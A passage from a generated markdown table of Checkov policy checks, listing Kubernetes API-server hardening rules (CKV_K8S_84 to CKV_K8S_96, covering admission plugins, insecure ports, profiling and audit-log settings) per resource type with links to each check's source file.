[ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | -| 3044 | CKV_K8S_84 | resource | PodTemplate | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | -| 3045 | CKV_K8S_84 | resource | ReplicaSet | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | -| 3046 | CKV_K8S_84 | resource | ReplicationController | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | -| 3047 | CKV_K8S_84 | resource | StatefulSet | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | -| 3048 | CKV_K8S_85 | resource | CronJob | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | -| 3049 | CKV_K8S_85 | resource | DaemonSet | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | -| 3050 | CKV_K8S_85 | resource | Deployment | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | -| 3051 | CKV_K8S_85 | resource | DeploymentConfig | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | -| 3052 | CKV_K8S_85 | resource | Job | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | -| 3053 | CKV_K8S_85 | resource | Pod | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | -| 3054 | CKV_K8S_85 | resource | PodTemplate | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | -| 3055 | CKV_K8S_85 | resource | ReplicaSet | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | -| 3056 | CKV_K8S_85 | resource | ReplicationController | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | -| 3057 | CKV_K8S_85 | resource | StatefulSet | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | -| 3058 | CKV_K8S_86 | resource | CronJob | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | -| 3059 | CKV_K8S_86 | resource | DaemonSet | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | -| 3060 | CKV_K8S_86 | resource | Deployment | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | -| 3061 | CKV_K8S_86 | resource | DeploymentConfig | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | -| 3062 | CKV_K8S_86 | resource | Job | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | -| 3063 | CKV_K8S_86 | resource | Pod | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | -| 3064 | CKV_K8S_86 | resource | PodTemplate | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | -| 3065 | CKV_K8S_86 | resource | ReplicaSet | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | -| 3066 | CKV_K8S_86 | resource | ReplicationController | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | -| 3067 | CKV_K8S_86 | resource | StatefulSet | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | -| 3068 | CKV_K8S_88 | resource | CronJob | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | -| 3069 | CKV_K8S_88 | resource | DaemonSet | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | -| 3070 | CKV_K8S_88 | resource | Deployment | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | -| 3071 | CKV_K8S_88 | resource | DeploymentConfig | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | -| 3072 | CKV_K8S_88 | resource | Job | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | -| 3073 | CKV_K8S_88 | resource | Pod | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | -| 3074 | CKV_K8S_88 | resource | PodTemplate | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | -| 3075 | CKV_K8S_88 | resource | ReplicaSet | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | -| 3076 | CKV_K8S_88 | resource | ReplicationController | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | -| 3077 | CKV_K8S_88 | resource | StatefulSet | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | -| 3078 | CKV_K8S_89 | resource | CronJob | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | -| 3079 | CKV_K8S_89 | resource | DaemonSet | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | -| 3080 | CKV_K8S_89 | resource | Deployment | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | -| 3081 | CKV_K8S_89 | resource | DeploymentConfig | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | -| 3082 | CKV_K8S_89 | resource | Job | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | -| 3083 | CKV_K8S_89 | resource | Pod | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | -| 3084 | CKV_K8S_89 | resource | PodTemplate | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | -| 3085 | CKV_K8S_89 | resource | ReplicaSet | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | -| 3086 | CKV_K8S_89 | resource | ReplicationController | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | -| 3087 | CKV_K8S_89 | resource | StatefulSet | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | -| 3088 | CKV_K8S_90 | resource | CronJob | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | -| 3089 | CKV_K8S_90 | resource | DaemonSet | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | -| 3090 | CKV_K8S_90 | resource | Deployment | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | -| 3091 | CKV_K8S_90 | resource | DeploymentConfig | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | -| 3092 | CKV_K8S_90 | resource | Job | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | -| 3093 | CKV_K8S_90 | resource | Pod | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | -| 3094 | CKV_K8S_90 | resource | PodTemplate | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | -| 3095 | CKV_K8S_90 | resource | ReplicaSet | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | -| 3096 | CKV_K8S_90 | resource | ReplicationController | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | -| 3097 | CKV_K8S_90 | resource | StatefulSet | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | -| 3098 | CKV_K8S_91 | resource | CronJob | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | -| 3099 | CKV_K8S_91 | resource | DaemonSet | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | -| 3100 | CKV_K8S_91 | resource | Deployment | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | -| 3101 | CKV_K8S_91 | resource | DeploymentConfig | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | -| 3102 | CKV_K8S_91 | resource | Job | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | -| 3103 | CKV_K8S_91 | resource | Pod | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | -| 3104 | CKV_K8S_91 | resource | PodTemplate | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | -| 3105 | CKV_K8S_91 | resource | ReplicaSet | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | -| 3106 | CKV_K8S_91 | resource | ReplicationController | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | -| 3107 | CKV_K8S_91 | resource | StatefulSet | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | -| 3108 | CKV_K8S_92 | resource | CronJob | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | -| 3109 | CKV_K8S_92 | resource | DaemonSet | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | -| 3110 | CKV_K8S_92 | resource | Deployment | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | -| 3111 | CKV_K8S_92 | resource | DeploymentConfig | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | -| 3112 | CKV_K8S_92 | resource | Job | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | -| 3113 | CKV_K8S_92 | resource | Pod | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | -| 3114 | CKV_K8S_92 | resource | PodTemplate | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | -| 3115 | CKV_K8S_92 | resource | ReplicaSet | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | -| 3116 | CKV_K8S_92 | resource | ReplicationController | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | -| 3117 | CKV_K8S_92 | resource | StatefulSet | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | -| 3118 | CKV_K8S_93 | resource | CronJob | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | -| 3119 | CKV_K8S_93 | resource | DaemonSet | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | -| 3120 | CKV_K8S_93 | resource | Deployment | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | -| 3121 | CKV_K8S_93 | resource | DeploymentConfig | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | -| 3122 | CKV_K8S_93 | resource | Job | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | -| 3123 | CKV_K8S_93 | resource | Pod | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | -| 3124 | CKV_K8S_93 | resource | PodTemplate | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | -| 3125 | CKV_K8S_93 | resource | ReplicaSet | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | -| 3126 | CKV_K8S_93 | resource | ReplicationController | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | -| 3127 | CKV_K8S_93 | resource | StatefulSet | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | -| 3128 | CKV_K8S_94 | resource | CronJob | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | -| 3129 | CKV_K8S_94 | resource | DaemonSet | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | -| 3130 | CKV_K8S_94 | resource | Deployment | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | -| 3131 | CKV_K8S_94 | resource | DeploymentConfig | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | -| 3132 | CKV_K8S_94 | resource | Job | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | -| 3133 | CKV_K8S_94 | resource | Pod | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | -| 3134 | CKV_K8S_94 | resource | PodTemplate | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | -| 3135 | CKV_K8S_94 | resource | ReplicaSet | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | -| 3136 | CKV_K8S_94 | resource | ReplicationController | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | -| 3137 | CKV_K8S_94 | resource | StatefulSet | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | -| 3138 | CKV_K8S_95 | resource | CronJob | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | -| 3139 | CKV_K8S_95 | resource | DaemonSet | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | -| 3140 | CKV_K8S_95 | resource | Deployment | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | -| 3141 | CKV_K8S_95 | resource | DeploymentConfig | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | -| 3142 | CKV_K8S_95 | resource | Job | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | -| 3143 | CKV_K8S_95 | resource | Pod | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | -| 3144 | CKV_K8S_95 | resource | PodTemplate | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | -| 3145 | CKV_K8S_95 | resource | ReplicaSet | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | -| 3146 | CKV_K8S_95 | resource | ReplicationController | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | -| 3147 | CKV_K8S_95 | resource | StatefulSet | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | -| 3148 | CKV_K8S_96 | resource | CronJob | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | -| 3149 | CKV_K8S_96 | resource | DaemonSet | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | -| 3150 | CKV_K8S_96 | resource | Deployment | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | -| 3151 | CKV_K8S_96 | resource | DeploymentConfig | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | -| 3152 | CKV_K8S_96 | resource | Job | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | -| 3153 | CKV_K8S_96 | resource | Pod | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | -| 3154 | CKV_K8S_96 | resource | PodTemplate | Ensure that the --service-account-lookup argument is set to true | Kubernetes | 